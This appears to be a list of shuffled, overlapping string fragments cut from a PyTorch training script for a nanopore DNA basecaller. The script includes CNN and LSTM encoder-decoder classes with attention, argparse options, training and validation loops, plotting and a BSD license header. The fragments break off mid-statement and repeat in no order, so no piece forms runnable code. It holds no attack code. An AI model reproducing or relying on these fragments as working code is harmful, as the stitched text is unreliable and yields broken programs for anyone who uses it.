"hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1)",
"batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder,",
"default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation",
"args.input fname = args.output port = args.gpu_port SEED = args.set_seed batch = args.batch_size",
"forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention",
"train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size]",
"= lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder",
"= train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training",
"seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len =",
"print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy:",
"both have shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence length in",
"in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration +",
"[batch, seq_len, input_dim] # pack_padded_sequence so that padded items in the sequence won't",
"nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val",
"performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\")",
"updates % make_validation == 0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1,",
"dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out],",
"args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias",
"+= loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val +=",
"= train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train =",
"running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates % make_validation == 0:",
"x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM layer # shape of",
"val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between",
"edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best",
"sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len,",
"# CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256,",
"class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional",
"b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in",
"with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname),",
"distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings",
"= cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden",
"sort labels so that they match with order in batch labels_sorted = labels[sorted_idx_target,",
"print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration",
"x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4)",
"input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len):",
"1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val",
"in a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10,",
"Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output,",
"the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the",
"True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s',",
"label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val,",
"[] acc_iteration = [] editd_iteration = [] for iteration, data in enumerate(train_loader): model.train()",
"parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\")",
"\"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch]",
"the pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g',",
"= args.bi_lstm attention = args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn",
"seaborn as sns import pandas as pd import argparse from distutils.util import strtobool",
"4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2,",
"plt.title(\"Accuracy vs. updates from validation set\") if editD: ax = fig.add_subplot(1, 3, 3)",
"hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 =",
"train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5]",
"ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized",
"if \"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size())",
"outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0, n//4 # ordering",
"# input for LSTM seq_length x out_size # Calculate cross entropy loss #",
"in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] #",
"editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1,",
"parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update",
"dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping",
"editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\",",
"1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p]",
"# [max. target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq =",
"encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5",
"val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between 1 and",
"# Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2,",
"size] is typically chosen between 1 and a few hundreds, e.g. [batch size]",
"__init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size",
"counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop",
"= [] editd_iteration = [] for iteration, data in enumerate(train_loader): model.train() #Set the",
"pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2))",
"= 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1,",
"self.port = port self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim,",
"= y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :,",
"[batch size, SOS token] for i in max_for: # Stop looping if we",
"that the following conditions are met: 1. Redistributions of source code must retain",
"decoder must have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None,",
"+ \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0],",
"num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port",
"nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int,",
"= nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if",
"must have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder",
"editd = 0 num_chars = 0 for idx, length in enumerate(target_lengths): length =",
"3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit",
"= pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 =",
"100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch]",
"\", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen",
"teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features",
"writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start, 3600) minutes, seconds =",
"= 1 #arbitrary number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value))",
"signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y",
"earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of the training iteration:",
"infile print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir",
"THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.",
"labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True):",
"forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate",
"MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL",
"or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks",
"in model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\" in",
"acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train],",
"h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) #",
"file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of the training",
"'--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs',",
"in p and \"linear\" not in p: n = matrix_param[p].shape[0] # input gate",
"ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend()",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end",
"out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False,",
"= CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in",
"+= loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() /",
"won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define",
"np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates]",
"padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item()",
"(seq*batch, out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val =",
"acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD:",
"#/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] =",
"os import sys import torch import torch.nn as nn from torch.autograd import Variable",
"self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers,",
"= convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed +=",
"torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len)",
"OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL",
"+= acc acc_iteration.append(acc) #if editD: # if updates % make_validation == 0: #",
"the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True,",
"disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this",
"F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c) + (ingate * cellgate)",
"0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0",
"(a, b), where a and b both have shape (num_layers, batch_size, hidden_dim). #",
"i) for epoch in p.keys(): if epoch % print_epoch == 0 or epoch",
"hidden) # [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq,",
"len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time",
"# create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab =",
"dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2))",
"elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc",
"np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val +",
"dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd",
"else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll",
"3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates",
"batch_y10 = data[4] #Wrap them in a Variable object inputs, labels, labels10 =",
"batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder",
"and \"linear\" not in name: print(name,param.data.size()) n = param.size(0) # forget gate start,",
"dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers",
"features # rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] =",
"= nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers,",
"y = y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches,",
"top1 = input_decoder.argmax(1) # get argmax of prediction #if teacher forcing, use actual",
"matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: #",
"unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module):",
"hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden = (h, c) label",
"= nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll initialise",
"batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels =",
"input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we",
"create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your",
"2021 (<EMAIL>) All rights reserved. Redistribution and use in source and binary forms,",
"editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2,",
"self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size,",
"num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout = args.dropout #",
"true seq length if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches =",
"if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in",
"class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size",
"bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim =",
"pickle import random import time import matplotlib.pyplot as plt import matplotlib.ticker as ticker",
"ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val)",
"FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER",
"model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder =",
"# script directory file_out = script_dir + \"/\" + infile print(file_out) with open(file_out,",
"hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim",
"trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training:",
"pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if __name__ == '__main__': sys.exit(basecalling(sys.argv))",
"= 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of",
"fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch % print_epoch == 0",
"and (updates % make_validation == 0): # or (updates == n_epochs-1)): if reduced_TF:",
"sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not padded elements loss_val",
"hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original #",
"trainings set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training",
"actual next token as next input #if not, use predicted token onehot =",
"= time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds",
"dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS",
"n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5:",
"for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c =",
"pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn)",
"= get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader",
"\" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length:",
"input for LSTM batch_size x seq_length x input_size #### LSTM if (seq_len_cnn <=",
"of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val",
"labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length",
"= args.gpu_port SEED = args.set_seed batch = args.batch_size epochs = args.epochs make_validation =",
"< true_y_len # get indices of not padded sequences true_y_len = true_y_len[not_padded_batches] #",
"# input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch,",
"h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for",
"None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3]",
"ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for",
"== reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if",
"from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v",
"= LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port,",
"plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if pdf",
"ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight",
"self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False,",
"# encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port))",
"figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]),",
"2: # and matrix_param[p].shape[1] == 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0],",
"self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim,",
"cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] =",
"batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val",
"other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required =",
"##### Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder(",
"\"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n",
"pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2))",
"in name and \"linear\" not in name: print(name,param.data.size()) n = param.size(0) # forget",
"ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE",
"the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in =",
"import torch.optim as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder",
"stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration",
"= [] for iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients to",
"and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0",
"model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher,",
"num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None,",
"trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\",",
"and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must",
